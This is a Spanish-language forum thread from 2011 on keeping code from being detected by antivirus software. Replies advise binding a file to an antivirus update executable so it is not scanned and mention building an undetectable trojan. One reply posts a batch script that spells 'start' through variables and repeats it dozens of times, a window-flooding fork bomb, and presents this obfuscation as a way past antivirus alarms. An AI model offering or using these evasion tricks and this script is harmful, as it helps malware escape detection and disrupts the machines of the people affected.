¿Hacer que no lo detecte mi antivirus?

TheInfinityJoker · 11 Abril 2011, 00:39 AM

Y porque no enmascararlo juntándolo con algún archivo que el antivirus no pueda analizar? Ej. si lo juntas con el .exe de actualización del antivirus, este al no analizarle, no le va a descubrir.

Fuentes: Testeado con BitDefender 2011 por mi.

zerocoolcom · 11 Abril 2011, 00:43 AM

Cita de: MrDJcKMC en 11 Abril 2011, 00:39 AM
Y porque no enmascararlo juntándolo con algún archivo que el antivirus no pueda analizar? Ej. si lo juntas con el .exe de actualización del antivirus, este al no analizarle, no le va a descubrir.

Fuentes: Testeado con BitDefender 2011 por mi.

Pero depende del antivirus la primera ves q borre todo de mi compu fue por q el karspersky q detecta todo como virus o almenos eso hacia y lo q se conecte a internet como programa malicioso me hizo la gracia de borrar el explorer entre algunos otros programas y cosas por lo q no iniciaba el sistema operativo. Igual y ya cambio igual y si depende del antivirus

Edu · 11 Abril 2011, 17:23 PM

Algunos antivirus detectan el System(); como codigo malicioso

TheInfinityJoker · 11 Abril 2011, 23:20 PM

Con el Serv-U2 se puede (o podía) hacer un troyano indetectable xDDDD
Me acuerdo que salia en alguno de los primeros números del HackxCrack, en el 1 o el 2.

zerocoolcom · 13 Abril 2011, 06:46 AM

Cita de: XXX-ZERO-XXX en 11 Abril 2011, 17:23 PM
Algunos antivirus detectan el System(); como codigo malicioso

como cual?
Nadamas para saber

Edu · 14 Abril 2011, 00:18 AM

Estaba drogado cuando lo dije, pero lo he escuchado que lo dicen por aca, pero parece q es mentira, asique dale pa adelante con el System() xD

TheInfinityJoker · 19 Abril 2011, 00:11 AM

Perdonen por mi ausencia, pero al final hiciste lo que yo te dije? O que hiciste?

CAR3S? · 26 Abril 2011, 21:56 PM

no lei el th , pero te digo

Código [Seleccionar]


set a=t
set d=s
set f=a
set n=r
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%

explico:
%d%%a%%f%%n%%a% = start

que carajos? , diras

arriba declare que:

set a=t
set d=s
set f=a
set n=r

estoy diciendo que la:
a vale "t"
d vale "s"
f vale "a"
n vale "r"

----- esto se llama cifrar ----

para indicar que es una 'variable' se usa un % al comienzo y un % al final

otro ejemplo:

Código [Seleccionar]

set xxx=echo
set saludo=hola
set australopitecusentangacoloradaconhermosamaya=cls
@echo off
%australopitecusentangacoloradaconhermosamaya%
%xxx% %saludo%
pause

SuperDraco · 26 Abril 2011, 23:38 PM

vaya, ahora entiendo porque la mayoria de "virus" bat están cifrados, es para bypass la alarma de los antivirus, interesante, aunq ese cifrado es bastante básico, pero muy buena solución!!!